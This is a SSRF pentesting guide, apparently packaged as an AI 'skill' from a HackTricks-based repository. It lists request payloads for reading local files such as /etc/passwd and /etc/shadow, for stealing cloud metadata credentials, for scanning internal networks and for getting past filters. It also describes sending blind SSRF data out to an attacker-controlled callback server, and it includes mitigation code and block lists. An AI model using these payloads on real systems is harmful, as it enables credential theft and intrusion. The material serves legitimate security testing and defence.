Hacktricks-skills ssrf-vulnerability-testing

How to identify and test for Server-Side Request Forgery (SSRF) vulnerabilities in web applications. Use this skill whenever the user mentions SSRF, server-side request forgery, internal network access, cloud metadata endpoints, or wants to test if an application can make requests to internal systems. This skill covers SSRF payloads, vulnerable platforms, blind SSRF chains, and mitigation strategies.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms/SKILL.MD

source content

SSRF Vulnerability Testing

A comprehensive guide to identifying, testing, and exploiting Server-Side Request Forgery vulnerabilities in web applications.

What is SSRF?

Server-Side Request Forgery (SSRF) is a vulnerability where an attacker can trick a server into making requests to an unintended location. This can expose internal services, cloud metadata endpoints, or allow attackers to interact with systems that should be protected.

When to Use This Skill

Use this skill when:

Testing web applications for SSRF vulnerabilities
Analyzing applications that accept URLs, file paths, or image sources
Investigating potential internal network access through web apps
Working with cloud environments and metadata endpoints
Building security assessments that include SSRF testing

SSRF Testing Workflow

1. Identify Potential SSRF Vectors

Look for these common input points:

URL parameters (
```
?url=
```
,
```
?redirect=
```
,
```
?callback=
```
)
Image upload fields that fetch remote images
API endpoints that accept URLs
Webhook configuration pages
Import/export functionality
RSS feed readers
PDF generators from URLs

2. Basic SSRF Testing

Start with these fundamental tests:

# Test if SSRF is possible
?url=http://127.0.0.1:80
?url=http://localhost:80
?url=http://0.0.0.0:80
?url=http://[::1]:80

# Test with different protocols
?url=file:///etc/passwd
?url=gopher://127.0.0.1:80/_GET / HTTP/1.1\r\nHost: localhost
?url=dict://127.0.0.1:11211/VERSION

3. Blind SSRF Detection

When there's no direct response, use out-of-band detection:

# Using DNS rebinding
?url=http://<your-dns-rebinding-domain>

# Using HTTP callback
?url=http://<your-server>/callback?param=<data>

# Using DNS log exfiltration
?url=http://<data>.<your-domain>

4. Cloud Metadata Endpoints

Test for cloud provider metadata access:

# AWS
?url=http://169.254.169.254/latest/meta-data/
?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

# Azure
?url=http://169.254.169.254/metadata/instance?api-version=2021-02-01
?url=http://169.254.169.254/metadata/instance/identity/oauth2/token?api-version=2018-10-01

# Google Cloud
?url=http://169.254.169.254/computeMetadata/v1/
?url=http://metadata.google.internal/computeMetadata/v1/

# DigitalOcean
?url=http://169.254.169.254/metadata/v1/

5. Internal Network Scanning

Use SSRF to scan internal networks:

# Common internal IP ranges
?url=http://10.0.0.1:80
?url=http://172.16.0.1:80
?url=http://192.168.1.1:80
?url=http://10.0.0.0/16
?url=http://172.16.0.0/12
?url=http://192.168.0.0/16

# Service discovery
?url=http://127.0.0.1:22
?url=http://127.0.0.1:3306
?url=http://127.0.0.1:5432
?url=http://127.0.0.1:6379
?url=http://127.0.0.1:27017
?url=http://127.0.0.1:9200

6. SSRF Payloads by Protocol

# HTTP/HTTPS
?url=http://<target>
?url=https://<target>

# File protocol
?url=file:///etc/passwd
?url=file:///etc/shadow
?url=file:///proc/self/environ
?url=file:///var/log/auth.log

# Gopher protocol
?url=gopher://<target>:<port>/_<payload>

# Dict protocol
?url=dict://<target>:<port>/<command>

# LDAP
?url=ldap://<target>:389/<dn>

# FTP
?url=ftp://<target>:21/<path>

# Redis
?url=redis://127.0.0.1:6379

# MongoDB
?url=mongodb://127.0.0.1:27017

7. Bypassing Filters

Common filter bypass techniques:

# IP encoding
?url=http://0177.0.0.1  # Octal
?url=http://0x7f.0.0.1  # Hexadecimal
?url=http://127.1  # Shortened
?url=http://127.0.0.01  # Leading zeros
?url=http://127.0.0.1%00  # Null byte
?url=http://127.0.0.1%0a  # Newline

# URL encoding
?url=http://127.0.0.1  # %2e = .
?url=http://127%2e0%2e0%2e1

# DNS rebinding
?url=http://<rebinding-domain>

# Using localhost variations
?url=http://localhost
?url=http://localhost.localdomain
?url=http://localhost.localdomain.local
?url=http://127.0.0.1.nip.io

# Using IPv6
?url=http://[::1]
?url=http://[0:0:0:0:0:0:0:1]
?url=http://[::ffff:127.0.0.1]

# Using data URI
?url=data:text/html,<script>alert(1)</script>

# Using javascript URI
?url=javascript:alert(1)

8. Blind SSRF Chains

For blind SSRF, chain multiple requests to exfiltrate data:

First request: Trigger SSRF to internal service
Second request: Use response to make another request
Continue: Chain until data reaches attacker-controlled server

See: Blind SSRF Chains - AssetNote

Vulnerable Platforms and Frameworks

Common Vulnerable Components

WordPress: Various plugins with URL input
Joomla: Component vulnerabilities
Drupal: Module SSRF issues
Magento: Admin panel vulnerabilities
Confluence: CVE-2019-3396, CVE-2021-26084
Jenkins: Plugin vulnerabilities
GitLab: Import/export features
Docker: Registry pull vulnerabilities

Framework-Specific Issues

# Python requests library
requests.get(user_input_url)  # Vulnerable if not validated

# PHP file_get_contents()
file_get_contents($user_url)  # Vulnerable if not validated

# Node.js axios
axios.get(userInputUrl)  # Vulnerable if not validated

# Java HttpURLConnection
url.openConnection()  # Vulnerable if not validated

Mitigation Strategies

1. Input Validation

# Allowlist approach (recommended)
ALLOWED_DOMAINS = ['example.com', 'trusted-site.com']

def validate_url(url):
    parsed = urlparse(url)
    if parsed.netloc not in ALLOWED_DOMAINS:
        raise ValueError("URL not in allowlist")
    return url

2. Block Internal IPs

import ipaddress

BLOCKED_RANGES = [
    '127.0.0.0/8',
    '10.0.0.0/8',
    '172.16.0.0/12',
    '192.168.0.0/16',
    '169.254.0.0/16',
    '::1/128',
    'fc00::/7',
    'fe80::/10',
]

def is_blocked_ip(ip):
    ip_obj = ipaddress.ip_address(ip)
    for blocked in BLOCKED_RANGES:
        if ip_obj in ipaddress.ip_network(blocked):
            return True
    return False

3. Disable Dangerous Protocols

# Python requests
from requests.utils import requote_uri

def safe_request(url):
    parsed = urlparse(url)
    if parsed.scheme not in ['http', 'https']:
        raise ValueError("Only HTTP/HTTPS allowed")
    return requests.get(url)

4. Use Security Headers

X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'

5. Network-Level Protections

Use firewalls to block outbound connections to internal networks
Implement egress filtering
Use separate network zones for web applications
Monitor for unusual outbound traffic patterns

Testing Tools

Manual Testing

# curl for basic testing
curl -X POST -d "url=http://127.0.0.1" http://target/vulnerable-endpoint

# Using Burp Suite
# Configure proxy, intercept requests, modify URL parameters

# Using custom scripts
python ssrf-tester.py --target http://target --payloads payloads.txt

Automated Tools

Nuclei: SSRF templates
SSRFmap: Automated SSRF detection
dalfox: SSRF scanner
Arjun: Parameter discovery
ffuf: Fuzzing tool

Reporting SSRF Findings

When documenting SSRF vulnerabilities:

Vulnerability Type: Server-Side Request Forgery
Severity: Critical/High (depending on impact)
Affected Endpoint: Full URL with parameters
Proof of Concept: Working payload
Impact: What can be accessed/exploited
Remediation: Specific mitigation steps
CVSS Score: Calculate based on impact

References

Important Notes

Always get proper authorization before testing
SSRF can have severe security implications
Test in isolated environments when possible
Document all findings thoroughly
Follow responsible disclosure practices